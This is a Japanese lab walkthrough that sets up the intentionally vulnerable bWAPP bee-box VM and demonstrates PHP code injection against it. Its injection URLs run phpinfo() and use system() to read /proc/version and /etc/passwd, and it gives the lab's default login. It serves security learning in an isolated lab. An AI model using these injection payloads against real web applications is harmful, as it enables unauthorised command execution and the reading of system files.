Webアプリに対して、ハッキングをしていきます。
使用するのはbWAPP(buggy web application)です。
主にWebアプリのセキュリティを学習するためのWebアプリで、100を超える脆弱性を備えています。
まとめ記事(①〜⑯をまとめてます)
【ハッキング・ラボのつくりかた】をやってみた
システム環境
仮想化ソフト
:VirtualBox 6.1.0
ホストOS
:Windows10
ゲストOS1
:Kali Linux 2020.1
ゲストOS2
:Windows7
ゲストOS3
:Windows10
ゲストOS4
:Metasploitable
ゲストOS5
:bWAPP bee-box v1.6
bWAPP bee-boxのセットアップ
bWAPP bee-boxは、bWAPPがインストールされているUbuntuベースのLinuxです。
まず、以下のサイトからbee-box_v1.6.7zファイルをダウンロードします。
https://sourceforge.net/projects/bwapp/files/bee-box/
ファイルを展開します。
展開には7-Zipを使用しました。
ファイル変換に使用するため、VMWareをインストールします。
以下のコマンドでvmxファイルからovfファイルを生成します。
第1引数がvmxファイルパス、第2引数がovfファイルパスです。
# cd C:\Program Files (x86)\VMware\VMware Player\OVFTool
# .\ovftool.exe "C:\Users\ユーザー名\Downloads\bee-box\bee-box.vmx" "C:\Users\buffo\Downloads\bee-box\bee-box.ovf"
仮想アライアンスをインポートします。
名前はbee-box 1.6に変更しました。
また、仮想LANアダプターを「ホストオンリーアダプター」に設定します。
PHP Code Injection
IPアドレスを確認後、ブラウザで以下の画像にあるURLにアクセスし、ログインします。
ここでは、IPアドレスは10.0.0.109です。
Login
:bee
Password
:bug
Security level
:low
プルダウンメニューから「PHP Code Injection」を選択し、「Hack」ボタンを押します。
以下のURLにアクセスすると、helloと出力されることから、「message=」以降の文字列がWebページに反映されていると推測できます。
PHPの設定内容を表示してみます。
http://10.0.0.109/bWAPP/phpi.php?message=phpinfo()
他にもLinuxカーネルのバージョンやユーザー名等を表示することができます。
Linuxカーネルのバージョン
http://10.0.0.109/bWAPP/phpi.php?message=system('cat /proc/version');
ユーザー名
http://10.0.0.109/bWAPP/phpi.php?message=system('cat /etc/passwd');